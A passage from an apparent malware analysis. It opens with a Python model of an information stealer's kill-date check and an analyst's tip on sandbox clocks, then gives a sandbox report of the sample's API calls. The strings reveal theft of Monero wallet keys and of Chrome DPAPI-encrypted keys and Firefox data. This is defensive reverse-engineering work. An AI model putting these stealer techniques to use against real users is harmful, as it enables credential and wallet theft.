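def systemtime_to_filetime(year, month, day, hour=0, minute=0, second=0, ms=0):
    """Same result as SystemTimeToFileTime: 100 ns ticks since 1601-01-01 UTC."""
    dt = datetime(year, month, day, hour, minute, second, ms * 1000, tzinfo=timezone.utc)
    delta = dt - EPOCH_1601
    return (delta.days * 86_400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def filetime_to_datetime(ticks):
    """Reverse a FILETIME pulled from a memory dump back into a UTC datetime."""
    return EPOCH_1601 + timedelta(microseconds=ticks // 10)


# Assumption: the embedded date is "YYYY-MM-DD"; the report does not show the sscanf format.
KILL_DATE_RE = re.compile(r"^\s*(\d{4})-(\d{1,2})-(\d{1,2})\s*$")


def parse_kill_date(text):
    """Stand-in for the sscanf call: returns (year, month, day) or raises on a malformed string."""
    m = KILL_DATE_RE.match(text)
    if not m:
        raise ValueError("kill date not in the assumed YYYY-MM-DD form")
    return tuple(int(x) for x in m.groups())


def should_exit(now, kill_date_text):
    """True on the path that reaches ExitProcess: host clock strictly past the embedded date.

    `now` is a (year, month, day[, hour, minute, second, ms]) tuple as GetSystemTime would fill it.
    Whether the sample uses > or >= is not visible in the report; > is assumed here.
    """
    return systemtime_to_filetime(*now) > systemtime_to_filetime(*parse_kill_date(kill_date_text))


if __name__ == "__main__":
    # constructed values, not the sample's real expiry date
    print(should_exit((2024, 11, 1), "2024-10-31"))   # True: sample would exit
    print(should_exit((2024, 10, 30), "2024-10-31"))  # False: sample keeps running
```

Practical consequence for the analyst: a sandbox whose clock is past the embedded date sees only a clean ExitProcess and none of the later C2 or exfiltration activity, so a silent early exit in an otherwise convicted sample is a cue to pin the clock back and re-run. GetSystemTime returns UTC, so the local time zone of the analysis VM does not change the outcome.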
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C7FC7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C7FCE
                                  • RegOpenKeyExA.ADVAPI32(80000002,0146C048,00000000,00020119,?), ref: 006C7FEE
                                  • RegQueryValueExA.ADVAPI32(?,0147DAC0,00000000,00000000,000000FF,000000FF), ref: 006C800F
                                  • RegCloseKey.ADVAPI32(?), ref: 006C8022
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 3d4c4d1fd4cc25de7a096e16195f55c8a5826961d489f1ea03e534ab5aedda1f
                                  • Instruction ID: b3844285600ee987bf3e466073d24877a8f849733317b47b176bc02b3fae8d95
                                  • Opcode Fuzzy Hash: 3d4c4d1fd4cc25de7a096e16195f55c8a5826961d489f1ea03e534ab5aedda1f
                                  • Instruction Fuzzy Hash: F3114CB1A58205AFE710CFD4DD89FBBBBB9EB44B10F204119F615AB380D77599009BA1
                                  APIs
                                  • StrStrA.SHLWAPI(0147E2F0,00000000,00000000,?,006B9F71,00000000,0147E2F0,00000000), ref: 006C93FC
                                  • lstrcpyn.KERNEL32(00987580,0147E2F0,0147E2F0,?,006B9F71,00000000,0147E2F0), ref: 006C9420
                                  • lstrlen.KERNEL32(00000000,?,006B9F71,00000000,0147E2F0), ref: 006C9437
                                  • wsprintfA.USER32 ref: 006C9457
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 4eb3e70ba4b83afe742177874165be4facf925757e1c5b4b0adc886dc8269449
                                  • Instruction ID: 2c435526e7a4c2d2e9ec67b709ff37f166120eaab1b554698e85084fbbb8af3f
                                  • Opcode Fuzzy Hash: 4eb3e70ba4b83afe742177874165be4facf925757e1c5b4b0adc886dc8269449
                                  • Instruction Fuzzy Hash: 3C01D275518108FFCB04DFD8C948EAEBBB9EB44304F208548F9199B744D731EA50DB90
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006B12B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006B12BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006B12D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006B12F5
                                  • RegCloseKey.ADVAPI32(?), ref: 006B12FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: db71505cf0cb1ba6d78d97639620031c5d3ad3eff5545e697c0c3a0f0a7d703e
                                  • Instruction ID: 34ab87dace9f8a5f36c3aa72397157210a14014883eb900aed72424cfa15e9e8
                                  • Opcode Fuzzy Hash: db71505cf0cb1ba6d78d97639620031c5d3ad3eff5545e697c0c3a0f0a7d703e
                                  • Instruction Fuzzy Hash: 350131B9A58209BFDB00DFD0DC89FAEB778EB48700F104198FA1597380D770DA409B90
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 006C6903
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 006C69C6
                                  • ExitProcess.KERNEL32 ref: 006C69F5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: ee5bb17da8e7b17f76df4931d04e8646c4b24a519067f6b8c0eda554c5d8156f
                                  • Instruction ID: 9374d625d376c749dcab0a2f19794c1832fa25f5e2914b01105cdfde05a5a9eb
                                  • Opcode Fuzzy Hash: ee5bb17da8e7b17f76df4931d04e8646c4b24a519067f6b8c0eda554c5d8156f
                                  • Instruction Fuzzy Hash: 9E3118B1911218ABDB54EB90DC96FEEB779EF08304F40418DF20A67191DF74AA48CF69
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006D0E10,00000000,?), ref: 006C89BF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C89C6
                                  • wsprintfA.USER32 ref: 006C89E0
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: d29afe6060777c71c9249232566bf621b2983300d71747bbb82a5425f162d2ae
                                  • Instruction ID: 2161cd1edaf3e7a7817061d859bcf580796d728208654fa143c7887a37c0ea35
                                  • Opcode Fuzzy Hash: d29afe6060777c71c9249232566bf621b2983300d71747bbb82a5425f162d2ae
                                  • Instruction Fuzzy Hash: FF2130B1A58204AFDB04DFD4DD49FAEBBB8FB48710F10451DF615A7390C775A9008BA0
                                  APIs
                                  • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 006BA098
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                  • API String ID: 1029625771-1545816527
                                  • Opcode ID: 3b719af21cc92f28485fba0342d87b62389563152837f0e43aa4a60d2fd65b47
                                  • Instruction ID: d4ee38417ec77ec6b1081a70f7f49805483a4dfe845552c88f2b532d8a31bc63
                                  • Opcode Fuzzy Hash: 3b719af21cc92f28485fba0342d87b62389563152837f0e43aa4a60d2fd65b47
                                  • Instruction Fuzzy Hash: EBF01DB0A6C208AFD710AFE4EC88BA6B366E745300F200415E0059B390C2B5D8D4EB56
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,006C96AE,00000000), ref: 006C8EEB
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C8EF2
                                  • wsprintfW.USER32 ref: 006C8F08
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 2fd0f5744416a1ff85a6b490835abb37d8973a625b86e4c719a09a77ba51930f
                                  • Instruction ID: 214fa3169544692e212b40d37a3dddee282f101ac6f9b24b0e6fb50985fa3ed4
                                  • Opcode Fuzzy Hash: 2fd0f5744416a1ff85a6b490835abb37d8973a625b86e4c719a09a77ba51930f
                                  • Instruction Fuzzy Hash: 1DE08C70A5C308BBDB00CBD4DD0AE6DBBB8EB04301F100094FD0987340DA719E00AB91
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006C8CF0: GetSystemTime.KERNEL32(006D0E1B,0147A3C0,006D05B6,?,?,006B13F9,?,0000001A,006D0E1B,00000000,?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006C8D16
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006BAA11
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 006BAB2F
                                  • lstrlen.KERNEL32(00000000), ref: 006BADEC
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                  • DeleteFileA.KERNEL32(00000000), ref: 006BAE73
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 702010d651fca6b2f6a1100e2acd0b8a47774364f984d1a244ef6da7f4dbfc53
                                  • Instruction ID: 46cf24cb6e470e43cb2a6ce9c2a20cde3476850ae518d0f0a96eec1043a7608e
                                  • Opcode Fuzzy Hash: 702010d651fca6b2f6a1100e2acd0b8a47774364f984d1a244ef6da7f4dbfc53
                                  • Instruction Fuzzy Hash: 26E1CB7291011C9BCB44EBE4DDA2FFEB33AEF14304F50859DF11666191EE306A48DB6A
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006C8CF0: GetSystemTime.KERNEL32(006D0E1B,0147A3C0,006D05B6,?,?,006B13F9,?,0000001A,006D0E1B,00000000,?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006C8D16
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006BD581
                                  • lstrlen.KERNEL32(00000000), ref: 006BD798
                                  • lstrlen.KERNEL32(00000000), ref: 006BD7AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 006BD82B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: fd589c9af4e8bfe3b57594081c7fabf70c179143b8c005eb413ad01d85ac1b8e
                                  • Instruction ID: 29c808e03e16fe4ca65343c5dbdd701f1815abebed92f8fe82f996635af1af1b
                                  • Opcode Fuzzy Hash: fd589c9af4e8bfe3b57594081c7fabf70c179143b8c005eb413ad01d85ac1b8e
                                  • Instruction Fuzzy Hash: C091DC7291010C9BCB44EBE4DCA6FFEB33AEF14304F50456DF11666191EE34AA48DB6A
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006C8CF0: GetSystemTime.KERNEL32(006D0E1B,0147A3C0,006D05B6,?,?,006B13F9,?,0000001A,006D0E1B,00000000,?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006C8D16
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006BD901
                                  • lstrlen.KERNEL32(00000000), ref: 006BDA9F
                                  • lstrlen.KERNEL32(00000000), ref: 006BDAB3
                                  • DeleteFileA.KERNEL32(00000000), ref: 006BDB32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 67fb796a66d3c9251757db11d63f2f1e5aebedfa577ac35e117797b41f4799da
                                  • Instruction ID: 9ed5c6232a025b5f912bea9c2f4b62185b6b578421fd8a6b9b3465a286851de2
                                  • Opcode Fuzzy Hash: 67fb796a66d3c9251757db11d63f2f1e5aebedfa577ac35e117797b41f4799da
                                  • Instruction Fuzzy Hash: F881CA7291010C9BCB44FBE4DCA6EFEB33AEF54308F50455DF11666191EE34AA08DB6A
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction ID: 5bb87085ec6ed32f4b82d5e784b86f2bba97403263183f5e3d1de73c21e6692f
                                  • Instruction Fuzzy Hash: 7451EE72A00226EFEB298F14E965BBA73B4FF01310F24413DE90586692E739ED40DB91
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 006BA664
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: @$v10$v20
                                  • API String ID: 2746078483-278772428
                                  • Opcode ID: 510394d4f598d35c387da00fd4f031a6482582339072d219ef302da27bae0655
                                  • Instruction ID: 6763e3303b1acdcec00f5fcfc2789eaef36283118be46a4e169601e0cc09c0a9
                                  • Instruction Fuzzy Hash: DB5138B4A1420CABDB24EFE4CDA6FED7776AF44304F40811CE90A5B291DB70AA45CB56
                                  APIs
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006BA13C
                                    • Part of subcall function 006BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006BA161
                                    • Part of subcall function 006BA110: LocalAlloc.KERNEL32(00000040,?), ref: 006BA181
                                    • Part of subcall function 006BA110: ReadFile.KERNEL32(000000FF,?,00000000,006B148F,00000000), ref: 006BA1AA
                                    • Part of subcall function 006BA110: LocalFree.KERNEL32(006B148F), ref: 006BA1E0
                                    • Part of subcall function 006BA110: CloseHandle.KERNEL32(000000FF), ref: 006BA1EA
                                    • Part of subcall function 006C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006C8FE2
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,006D1678,006D0D93), ref: 006BF64C
                                  • lstrlen.KERNEL32(00000000), ref: 006BF66B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: 9c47fdaec699d0a0aa3202e2fdf889884e4a92b963bd5ce7e941671b991a018f
                                  • Instruction ID: bf4a527c615298d8c05b619253cb97d080e9f8f5a77bf4393313270ca08ca25d
                                  • Instruction Fuzzy Hash: 5D51FD7191010CAACB44FBE4EDA2EFD733AEF54304F40856DE51666191EE34AA08CB6A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 12a1f6cad5a9df957e3f35a197b0f74464b795f030ec32c9cd10ca128cfa8262
                                  • Instruction ID: 3e2f1ff7a15ec9a693e203c99a461f48e517c1c736a1a38a8e57b94bfd450aa5
                                  • Instruction Fuzzy Hash: A8411971E102099BDB04EFE4D955FFEB77AEF48308F10801DE51676290EB70AA05CBA6
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006BA13C
                                    • Part of subcall function 006BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006BA161
                                    • Part of subcall function 006BA110: LocalAlloc.KERNEL32(00000040,?), ref: 006BA181
                                    • Part of subcall function 006BA110: ReadFile.KERNEL32(000000FF,?,00000000,006B148F,00000000), ref: 006BA1AA
                                    • Part of subcall function 006BA110: LocalFree.KERNEL32(006B148F), ref: 006BA1E0
                                    • Part of subcall function 006BA110: CloseHandle.KERNEL32(000000FF), ref: 006BA1EA
                                    • Part of subcall function 006C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006C8FE2
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 006BA489
                                    • Part of subcall function 006BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Ok,00000000,00000000), ref: 006BA23F
                                    • Part of subcall function 006BA210: LocalAlloc.KERNEL32(00000040,?,?,?,006B4F3E,00000000,?), ref: 006BA251
                                    • Part of subcall function 006BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Ok,00000000,00000000), ref: 006BA27A
                                    • Part of subcall function 006BA210: LocalFree.KERNEL32(?,?,?,?,006B4F3E,00000000,?), ref: 006BA28F
                                    • Part of subcall function 006BA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 006BA2D4
                                    • Part of subcall function 006BA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 006BA2F3
                                    • Part of subcall function 006BA2B0: LocalFree.KERNEL32(?), ref: 006BA323
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: bd127ca82e74ea01035bea4ad3b33dca0ae1463b860059df6393760c1405afbc
                                  • Instruction ID: 139926836e43a634c982d13a79e1e337a2a7dfd48ae7dae7c1b7f6dcbf553343
                                  • Instruction Fuzzy Hash: 5D3130B6D1010DABCF24DBD4DC45EEEB7BAAF58304F44451DE902A7241E7319A44CBA6
                                  APIs
                                  • memset.MSVCRT ref: 006C967B
                                    • Part of subcall function 006C8EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,006C96AE,00000000), ref: 006C8EEB
                                    • Part of subcall function 006C8EE0: RtlAllocateHeap.NTDLL(00000000), ref: 006C8EF2
                                    • Part of subcall function 006C8EE0: wsprintfW.USER32 ref: 006C8F08
                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 006C973B
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 006C9759
                                  • CloseHandle.KERNEL32(00000000), ref: 006C9766
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                  • String ID:
                                  • API String ID: 3729781310-0
                                  • Opcode ID: 964ee37486ab13681d7f947449f8b86478d658ba4bd93cda0e58999acbefb7ee
                                  • Instruction ID: 8586ef0654e56f8ca0eb9aeb9b1640de302d14e91ab301c2dc38834eaadfb51d
                                  • Instruction Fuzzy Hash: FB3159B1A15208ABDB14DFE0CD89FEDB379FB44700F20445CF606AB284DB74AA48DB61
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006D05BF), ref: 006C885A
                                  • Process32First.KERNEL32(?,00000128), ref: 006C886E
                                  • Process32Next.KERNEL32(?,00000128), ref: 006C8883
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • CloseHandle.KERNEL32(?), ref: 006C88F1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 52585f1ff4ba0f624f74f4da9c886a01f430d5f3ebc67bdddc2b33600267b5fe
                                  • Instruction ID: 7f8364f8f9b9f4cbcbd804b87279e9be28534f508745462cafe8501069742edb
                                  • Instruction Fuzzy Hash: 21315971905218ABCB64EB95DC55FFEB37AEB04704F10419DF10AA32A0DB30AE44CFA5
                                  APIs
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0072FE13
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0072FE2C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value___vcrt_
                                  • String ID:
                                  • API String ID: 1426506684-0
                                  • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction ID: b8a0f7af0551925c54d6b9660a1ca0c4568f3755ed6db12bef9164ff8bfe73fb
                                  • Instruction Fuzzy Hash: E401843250D735EEF63A26746CC9A6B37A4EB017B5B354339F116851F3EF694C419240
                                  APIs
                                  • __getptd.LIBCMT ref: 006CCA7E
                                    • Part of subcall function 006CC2A0: __amsg_exit.LIBCMT ref: 006CC2B0
                                  • __getptd.LIBCMT ref: 006CCA95
                                  • __amsg_exit.LIBCMT ref: 006CCAA3
